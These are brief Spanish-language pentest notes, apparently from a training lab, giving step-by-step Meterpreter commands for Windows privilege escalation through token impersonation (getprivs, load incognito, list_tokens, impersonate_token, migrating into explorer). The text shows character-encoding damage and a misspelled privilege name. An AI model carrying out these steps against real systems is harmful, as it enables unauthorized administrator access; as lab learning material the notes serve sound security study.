En primer lugar, visualizamos privilegios asignados (getprivs), para poder llevar a cabo esta
explotaciΓ³n
Si en la lista vemos : SeImpersonatrePrivilege significa que podemos continuar
Cargamos una sesion de incogito en meterpreter: load incognito
Listamos tokens: list_tokens -u
Esto nos dara una lista como por ejemplo: ATTACKDEFENSEAdministrator
Impersonamos el token: impersonate_token "<token>" (IMPORTANTE LAS COMILLAS)
Ahora migramos al proceso explorer y disponemos de privilegios elevados
ββ[ code ]ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
pgrep explorer
migrate <PID>
getprivs
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ